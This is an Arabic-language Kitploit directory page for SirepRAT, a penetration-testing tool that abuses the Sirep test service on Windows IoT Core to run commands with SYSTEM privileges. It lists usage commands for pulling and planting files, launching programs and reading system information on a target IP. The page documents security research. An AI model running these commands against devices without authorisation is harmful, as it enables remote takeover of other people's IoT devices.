Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SirepRAT — تنفيذ أوامر عن بُعد بصلاحيات SYSTEM على Windows IoT Core (إصدارات متاحة لـ Python2.7 و Python3) | Kitploit
أدوات/GitHubGitHub/safebreach-labs/sireprat
أمان إنترنت الأشياءالاستغلالما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولات
GitHubsafebreach-labs/sireprat

SirepRAT

تنفيذ أوامر عن بُعد بصلاحيات SYSTEM على Windows IoT Core (إصدارات متاحة لـ Python2.7 و Python3)

عرض المستودع
388913منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SirepRAT

SirepRAT - RCE بصلاحية SYSTEM على Windows IoT Core

SirepRAT يتيح إمكانات RAT كاملة دون الحاجة إلى كتابة برمجية RAT حقيقية على الجهاز الهدف.

السياق

تعتمد الطريقة على استغلال خدمة اختبار Sirep المدمجة والتي تعمل على الصور الرسمية المقدمة من موقع Microsoft. تعد هذه الخدمة الجزء العميل من إعداد HLK الذي يمكن للمرء بناؤه لإجراء اختبارات السائقين/الأجهزة على جهاز إنترنت الأشياء. وهي تخدم بروتوكول Sirep/WPCon/TShell.

قمنا بتحليل بروتوكول Sirep/WPCon وأظهرنا كيف يكشف هذا البروتوكول واجهة أوامر عن بُعد للمهاجمين، تتضمن قدرات RAT مثل جلب/وضع ملفات عشوائية في مواقع عشوائية والحصول على معلومات النظام.

بناءً على النتائج التي استخرجناها من هذا البحث حول الخدمة والبروتوكول، بنينا أداة بسيطة بلغة بايثون تتيح استغلالهما باستخدام الأوامر المدعومة المختلفة. أطلقنا عليها اسم SirepRAT.

توفر واجهة مستخدم سهلة وبديهية لإرسال الأوامر إلى جهاز هدف يعمل بنظام Windows IoT Core. تعمل على أي جهاز متصل بالكابل يعمل بنظام Windows IoT Core وبصورة Microsoft رسمية.

الشرائح والورقة البحثية

الشرائح والورقة البحثية موجودة في مجلد docs

الإعداد

root@kitploit:~
pip install -r requirements.txt

الاستخدام

تنزيل ملف

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

رفع ملف

root@kitploit:~
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

تشغيل أي برنامج

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

مع المعاملات، وبانتحال هوية المستخدم الذي سجّل الدخول حالياً:

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(جرّب تشغيله بدون as_logged_on_user لإظهار قدرة التنفيذ بصلاحية SYSTEM)

الحصول على معلومات النظام

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

الحصول على معلومات ملف

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

راجع المساعدة للاطلاع على التفاصيل الكاملة:

root@kitploit:~
python SirepRAT.py --help

المؤلف

Dor Azouri (@bemikre)

المساهمون

movatica (@movatica) - نقل إلى بايثون 3! (في أواخر 2020)

الترخيص

BSD 3 - بند الترخيص "New" أو "Revised"

تنزيل الأداة